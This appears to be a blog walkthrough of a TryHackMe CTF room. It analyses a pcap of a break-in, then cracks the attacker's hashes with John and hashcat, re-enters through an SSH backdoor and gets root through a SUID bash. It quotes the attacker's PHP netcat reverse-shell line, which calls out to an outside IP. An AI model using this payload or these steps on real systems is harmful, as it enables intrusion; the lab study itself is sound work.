top of page
aldern00b

THM - Overpass 2 - Hacked


Overpass 2 - Looks like we're on the other end this time! If you didn't read my first part of this, you can find it here: https://www.aldern00b.com/post/thm-overpass


First things first, let's download the overpass 2 .pcap files and use WireShark to view 'em. Now, it's been a good solid minute since I've used WireShark so, bare with me here.


What was the URL of the page they used to upload a reverse shell?

I can see a POST right off the bat, and it's an upload.php file... sounds like this is it. Looking at the data, we can also see the name of the file is payload.php. The answer here would be


/development/


What payload did the attacker use to gain access?

Using this same line, we can dig down into the data and get what the payload was. After copying it to a notepad and cleaning it up a bit, this is what we see - a sneaky php reverse shell.


<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i2>&1|nc 192.168.170.145 4242 >/tmp/f")?>


What password did the attacker use to privesc?

I'm super lazy so I wanted to take this data and really filter it out to what I think I'm looking for. I did a right-click follow TCP Stream to bring up the full conversation on the first non-http TCP traffic I saw.



Doing this immediately showed me the password that was used, which is perfect - laziness triumphs!



How did the attacker establish persistence?

If we scroll down this conversation we can see that he pulled some git magic and installed an ssh-backdoor... I might have to go check that out later!



Using the fasttrack wordlist, how many of the system passwords were crackable?

Okay so this one, according to the hint is to check the dump of the shadow file he did (right above that git clone command) and see how many passwords were crackable. It looks like there's only 5 with hashes, let's copy those out to a file and use john the ripper. The fasttrack wordlist can be found under /usr/share/wordlists


The copy and paste is straight out of the text - no need to modify.



john --wordlist=/usr/share/wordlists/fasttrack.txt hashes

unfortunately I forgot to include the wordlist on the first run and stopped it... either way, I got all 4 - which is the answer btw!



whew... well that's the end of the first part - I think we need a quick break. Have you seen the episode of Family Guy, where he's trying to teach Quagmire how to use a PC?


Hillarious.



TASK 2

 

Alright, so now we gotta dig into the code a bit here. So we'll need to borrow his git clone command from the .pcap file we've been using and clone this down to the attack box.


git clone https://github.com/NinjaJc01/ssh-backdoor

Make it executable so we can do what we need


chmod +x backdoor

What's the default hash for the backdoor?

Let's first try looking at help to see how we can run some commands and maybe get that default hash.


./backdoor --help

Well, well. There's the answer right in front of us!



What's the hardcoded salt for the backdoor?

for this one we're going to want to


nano main.go

A function caught my attention, it was looking for the hash, salt and password to be provided to it.



Scrolling down, I see another function calling that function with the second variable hard coded - the salt!



What was the hash that the attacker used? - go back to the PCAP for this!

Going back to that PCAP file, we can see him using the -a switch, which, if we remember from the help switch, that's the hash that's being used.



Crack the hash using rockyou and a cracking tool of your choice. What's the password?

Yay! More password cracking! I always need the practice so no complaints here! Rockyou.txt is found in the same wordlist directory we previously used. We'll copy that hash to a file on the attack box and pound it with John.


Now unfortunately, you can't just copy and paste that bad boy in there because there's a salt. Looking back at the code it looks like it will be password followed by salt. Now the hint says make sure to use the correct mode...


So... doing some (okay a lot) of google research it looks like you can just put the hash and salt together in the file and they give examples how here: example_hashes [hashcat wiki]. Let's give it a go.


Using HashID I was able to determine it's an SHA-512, so using the above site I was able to determine how to put the file together.


I could NOT figure out how to get John to work for his... google was telling me you have to create all these complex strings and I couldn't put my head around it, so I switched over to hashcat, which was MUCH simpler. I think I might start working with this cracker more. If you're wondering where the 1710 comes from, it's from that link above where it gave you the hash types.


hashcat -m 1710 hashes /usr/share/wordlists/rockyou.txt 




TASK 3

 
The attacker defaced the website. What message did they leave as a heading?

Easy peasy, just visit the website.



Using the information you've found previously, hack your way back in!

Okay so looking at the Wireshark again, we can see that the ssh-backdoor was created but on a different port - port 2222



If we connect to that and use the new James password we found we should get in.


ssh james@[IP] -p 2222

What's the user flag?

If we back up a folder we'll see user.txt which will be our first flag. If we try and get to the root folder we see that fake James isn't an admin...



What's the root flag?

I took a minute to go through the list of usernames and password that we cracked previously and unfortunately, I got authentication errors on the passwords I got... which was interesting - guess he reset 'em. I checked for new users created, and also tried to run sudo as James but none of the passwords worked. Our previous cronjob is gone too!!


I kept looking at this .suid_bash hidden file... but I honestly had no idea what to do with it. After a long while, I had to look at someone elses walkthrough. I took a visit to https://niekdang.wordpress.com/2021/04/19/tryhackme-solution-overpass-2-hacked/ and he pointed to the same file I was looking at.



Running it by itself it does nothing and honestly, I wouldn't have thought about thinking it was the bash interpreter that has the SUID bit set. What ticked me off a bit was I didn't even think of checking SUID bits because we did that from the first hack and he didn't have anything special. This just goes to show, just like when I troubleshoot user issues: never assume - always re-check. SO let's walk through it like we SHOULD have.


find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

The above will list out all the files we see with the SUID bit set, we can see it there at the bottom.



Where this STILL would catch me is that I wouldn't have thought this was a bash interpreter - until I run it. Now that I know it's a bash interpreter we can use our GTFOBins site to see how to take advantage: bash | GTFOBins



When we run that file with the -p switch we get root



pop down a few folders and we have our flag. Thanks so much Neik for the hand at the end there. I still have a lot to learn but this just shows - sharing is caring. The more you know, the more you grow lol









14 views0 comments

Comments


bottom of page